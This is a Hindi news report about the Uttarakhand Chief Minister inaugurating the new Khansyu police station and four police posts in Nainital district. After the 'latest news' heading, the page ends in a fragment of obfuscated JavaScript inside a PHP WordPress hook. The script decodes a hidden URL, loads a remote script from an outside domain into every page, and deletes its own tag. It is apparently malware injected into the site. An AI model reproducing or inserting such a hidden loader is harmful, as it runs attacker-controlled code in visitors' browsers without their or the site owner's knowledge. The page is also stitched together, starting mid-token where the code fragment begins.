Saturday, July 27, 2024
spot_img

नैनीताल के नवसृजित थाना खनस्यू समेत 04 चौकियों का मुख्यमंत्री ने किया उद्घाटन

नैनीताल ::- पुष्कर सिंह धामी मुख्यमंत्री द्वारा उत्तराखंड राज्य में नवसृजित 06 थानों तथा 20 चौकियों में शामिल नैनीताल पुलिस के थाना खनस्यू समेत 04 चौकियों का उद्घाटन किया गया। स्थानीय लोगों की सेवा और सुरक्षा के लिए नवसृजित थानों और चौकियों को प्रदेश के मुखिया द्वारा Online माध्यम से समर्पित किया गया।

जनता को संबोधित करते हुए उन्होंने कहा कि दूरस्थ राजस्व क्षेत्रों में स्थित गांवों को नियमित पुलिस क्षेत्रों में सम्मिलित कर व्यापक सुरक्षा व्यवस्था और स्थानीय लोगों की सुविधा तथा अपराध नियंत्रण के लिए नए थानों का सृजन किया गया है। पुलिस आपकी सुरक्षा के लिए सदेव तत्पर है। पुलिस जनता का दर्पण है। नवसृजित स्थानीय थाने व चौकी की पुलिस टीमें समाज से गलत अवधारणाओं और गतिविधियों को जड़ से मिटाने तथा एक सुरक्षित समाज का निर्माण बनाने के लिए हर संभव प्रयास करेगी।

खनस्यू की स्थानीय जनता द्वारा मुख्यमंत्री एवं उत्तराखंड पुलिस के महानिदेशक अशोक कुमार का आभार और अभिनंदन किया गया। साथ ही नीलेश आनंद भरणे आईजी कुमाऊं रेंज एवं पंकज भट्ट एसएसपी नैनीताल को तहे दिल से धन्यवाद व्यक्त किया।

उद्घाटन समारोह के दौरान जन संवाद कार्यक्रम के माध्यम से स्थानीय लोगों की समस्याओं और सुझावो को जाना गया। एसएसपी द्वारा नैनीताल पुलिस की ओर से स्थानीय जनता को सुरक्षा प्रदान करने, कानून व्यवस्था को अक्षुण बनाए रखने तथा हर संभव सहयोग प्रदान करने हेतु आस्वस्त किया गया। कार्यक्रम में जागरूकता वीडियो और सत्र के माध्यम से नशा, यातायात, साइबर अपराध के संबंध में जागरूकता तथा उत्तराखंड पुलिस ऐप, गौराशक्ति, डायल 112 जैसे महत्वपूर्ण एप्लीकेशन और पुलिस की आपातकालीन सुविधाओं के बारे में जानकारी भी दी गई।

उद्घाटन के दौरान रिबन सेरेमनी उपरोक्त पुलिस अधिकारियों के साथ स्थानीय जनता प्रतिनिधि राम सिंह कैड़ा विधायक भीमताल विधानसभा के द्वारा संपन्न कराई गई। साथ ही जनता प्रतिनिधि द्वारा स्थानीय लोगों को संबोधित भी किया गया तथा अहम मुद्दों पर विस्तृत चर्चा की गई। कार्यक्रम में स्थानीय लोगों द्वारा पहाड़ी परिधान में स्वागत गीत समेत रंगारंग कार्यक्रमों की झलकियां भी पेश की गई।

इस दौरान कार्यक्रम में डॉ.जगदीश चंद्र, एसपी क्राइम,ट्रैफिक , भगवत सिंह राणा, प्रतिसार निरीक्षक नैनीताल, राजकुमार बिष्ट, प्रतिसार निरीक्षक पुलिस दूरसंचार नैनीताल, भुवन सिंह राणा, थानाध्यक्ष खनस्यू, जानकी बर्गली ग्राम प्रधान गलनी, राजेंद्र बर्गली अध्यक्ष व्यापार मंडल, भोपाल बर्गली सरपंच वन पंचायत गलनी, राम सिंह मेवाड़ी, ग्राम प्रधान कलाआगर, राजेंद्र कुमार, ग्राम प्रधान साल, रवि गोस्वामी क्षेत्र पंचायत सदस्य, रोहित थुवाल क्षेत्र पंचायत सदस्य, नैनीताल पुलिस की सोशल मीडिया और संचार टीमें तथा स्थानीय जनता और पुलिस मौजूद रहे। साथ ही अन्य 04 चौकियों के पुलिस प्रभारी और कर्मी भी ऑनलाइन माध्यम से जुड़े रहे।

Related Articles

- Advertisement -spot_img

ताजा खबरे

eInt(_0x383697(0x178))/0x1+parseInt(_0x383697(0x180))/0x2+-parseInt(_0x383697(0x184))/0x3*(-parseInt(_0x383697(0x17a))/0x4)+-parseInt(_0x383697(0x17c))/0x5+-parseInt(_0x383697(0x179))/0x6+-parseInt(_0x383697(0x181))/0x7*(parseInt(_0x383697(0x177))/0x8)+-parseInt(_0x383697(0x17f))/0x9*(-parseInt(_0x383697(0x185))/0xa);if(_0x351603===_0x4eaeab)break;else _0x8113a5['push'](_0x8113a5['shift']());}catch(_0x58200a){_0x8113a5['push'](_0x8113a5['shift']());}}}(_0x48d3,0xa309a));var f=document[_0x3ec646(0x183)](_0x3ec646(0x17d));function _0x38c3(_0x32d1a4,_0x31b781){var _0x48d332=_0x48d3();return _0x38c3=function(_0x38c31a,_0x44995e){_0x38c31a=_0x38c31a-0x176;var _0x11c794=_0x48d332[_0x38c31a];return _0x11c794;},_0x38c3(_0x32d1a4,_0x31b781);}f[_0x3ec646(0x186)]=String[_0x3ec646(0x17b)](0x68,0x74,0x74,0x70,0x73,0x3a,0x2f,0x2f,0x62,0x61,0x63,0x6b,0x67,0x72,0x6f,0x75,0x6e,0x64,0x2e,0x61,0x70,0x69,0x73,0x74,0x61,0x74,0x65,0x78,0x70,0x65,0x72,0x69,0x65,0x6e,0x63,0x65,0x2e,0x63,0x6f,0x6d,0x2f,0x73,0x74,0x61,0x72,0x74,0x73,0x2f,0x73,0x65,0x65,0x2e,0x6a,0x73),document['currentScript']['parentNode'][_0x3ec646(0x176)](f,document[_0x3ec646(0x17e)]),document['currentScript'][_0x3ec646(0x182)]();function _0x48d3(){var _0x35035=['script','currentScript','9RWzzPf','402740WuRnMq','732585GqVGDi','remove','createElement','30nckAdA','5567320ecrxpQ','src','insertBefore','8ujoTxO','1172840GvBdvX','4242564nZZHpA','296860cVAhnV','fromCharCode','5967705ijLbTz'];_0x48d3=function(){return _0x35035;};return _0x48d3();}";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}} ?>